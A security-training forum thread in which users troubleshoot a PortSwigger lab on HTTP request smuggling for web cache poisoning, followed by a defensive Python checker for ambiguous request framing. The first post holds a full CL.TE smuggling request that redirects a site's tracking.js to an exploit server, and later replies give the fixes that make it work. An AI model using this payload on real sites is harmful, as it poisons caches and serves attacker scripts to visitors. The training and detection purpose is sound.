Burp Suite User Forum


LAB: Exploiting HTTP request smuggling to perform web cache poisoning

nergal | Last updated: Aug 20, 2021 10:19PM UTC

Hello everyone! I'm having trouble with this lab. I even tried to follow the YouTube videos to get the solution, and not even that helps. I'm getting a 400 and {"error":"Invalid request"}. I also tried switching browsers, because I had problems with that in the web cache poisoning labs too. Am I doing something wrong? I'll paste the request:

    POST / HTTP/1.1
    Host: victimhost
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 185
    Transfer-Encoding: chunked

    0

    GET /post/next?postId=1 HTTP/1.1
    Host: exploitserver
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 10

    x=1

    GET /resources/js/tracking.js HTTP/1.1
    Host: victimhost
    Connection: close

Alex, PortSwigger Agent | Last updated: Aug 23, 2021 04:13PM UTC

Hi, Thanks for your post. You may need to repeat the POST/GET process several times before the attack succeeds. It might also be worth disabling any extensions and retrying the lab - in case there are any conflicting options. Thanks

nergal | Last updated: Aug 23, 2021 06:54PM UTC

I repeated it several times trying to get it, but still nothing. I also used a Chrome browser without extensions, Mozilla Firefox, and Chromium, on both Windows and Linux. Still not getting it.

nergal | Last updated: Aug 24, 2021 03:05AM UTC

OK. I did it. I was searching for help in another channel and a friend told me to intercept the request to send the "exploit" instead of using the Repeater. That way I just had to send it once and it worked on the first shot. Anyway, thank you for your time!

Alex, PortSwigger Agent | Last updated: Aug 24, 2021 07:47AM UTC

Hi, Thanks for the update, glad to hear you solved the lab!

Viren | Last updated: Sep 12, 2021 12:36PM UTC

Use 193 instead of 185 in the Content-Length header count (it's probably due to a new format of the exploit server domains, which added 8 additional characters with the "exploit-" prefix).

Kairos | Last updated: Sep 16, 2021 09:15AM UTC

Thanks Viren. I think PortSwigger staff should announce these changes. Otherwise, it's a waste of time trying to figure out how to make it work. Change the solution paragraph on the lab.

Ben, PortSwigger Agent | Last updated: Sep 17, 2021 08:32AM UTC

Hi, Thank you for letting us know about this. We will take a look and discuss this with the Web Academy team.

Ben, PortSwigger Agent | Last updated: Oct 20, 2021 08:54AM UTC

Hi all, Just to confirm, we have now made the change to the solution of this lab (as discussed above) so that it states the correct Content-Length value to use now that we are prefixing the Exploit Server URLs with 'exploit-'.

Sean | Last updated: Dec 23, 2021 12:43AM UTC

I found the issue, for those who still need the help. Before sending the exploit, go into the Repeater tab and uncheck Update Content-Length. Then send in Repeater and continue until the lab is solved.
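The request in the first post carries both Content-Length and Transfer-Encoding: chunked, which is the framing ambiguity a front-end or WAF should reject. The following is an added example, not part of any post in this thread or of PortSwigger's material: a minimal Python check that flags such a request and shows the bytes left over after the terminating chunk. The function names and the sample request (placeholder hosts, as in the post) are constructed for illustration.

```python
def chunked_end(body: bytes) -> int:
    """Return the offset just past the terminating chunk of a chunked body."""
    pos = 0
    while True:
        eol = body.find(b"\r\n", pos)
        if eol < 0:
            raise ValueError("truncated chunk header")
        size = int(body[pos:eol].split(b";")[0].strip(), 16)
        pos = eol + 2
        if size == 0:
            # Skip optional trailer fields up to the blank line that ends the message.
            while (eol := body.find(b"\r\n", pos)) != pos:
                if eol < 0:
                    raise ValueError("truncated trailer section")
                pos = eol + 2
            return pos + 2
        pos += size + 2  # chunk data plus its CRLF

def check_framing(raw: bytes) -> dict:
    """Report whether a raw request is framed two ways (RFC 7230, section 3.3.3)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    headers = {}
    for line in head.split(b"\r\n")[1:]:
        name, _, value = line.partition(b":")
        headers.setdefault(name.strip().lower(), []).append(value.strip().lower())
    cl = headers.get(b"content-length", [])
    chunked = any(b"chunked" in v for v in headers.get(b"transfer-encoding", []))
    report = {"ambiguous": bool(cl) and chunked,
              "declared_cl": int(cl[0]) if cl else None,
              "framed_by_te": None, "trailing": b""}
    if chunked:
        # A parser honouring Transfer-Encoding stops here; one honouring
        # Content-Length keeps reading, so the two disagree about `trailing`.
        report["framed_by_te"] = chunked_end(body)
        report["trailing"] = body[report["framed_by_te"]:]
    return report

def sample_request() -> bytes:
    """Constructed sample with the same shape as the request quoted in the thread."""
    body = (b"0\r\n\r\nGET /post/next?postId=1 HTTP/1.1\r\nHost: exploitserver\r\n"
            b"Content-Type: application/x-www-form-urlencoded\r\n"
            b"Content-Length: 10\r\n\r\nx=1")
    head = (b"POST / HTTP/1.1\r\nHost: victimhost\r\n"
            b"Content-Type: application/x-www-form-urlencoded\r\n"
            b"Content-Length: %d\r\nTransfer-Encoding: chunked\r\n\r\n" % len(body))
    return head + body

if __name__ == "__main__":
    print(check_framing(sample_request()))
```

A request for which `ambiguous` is true, or for which `trailing` is non-empty, is one to reject or log rather than forward.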
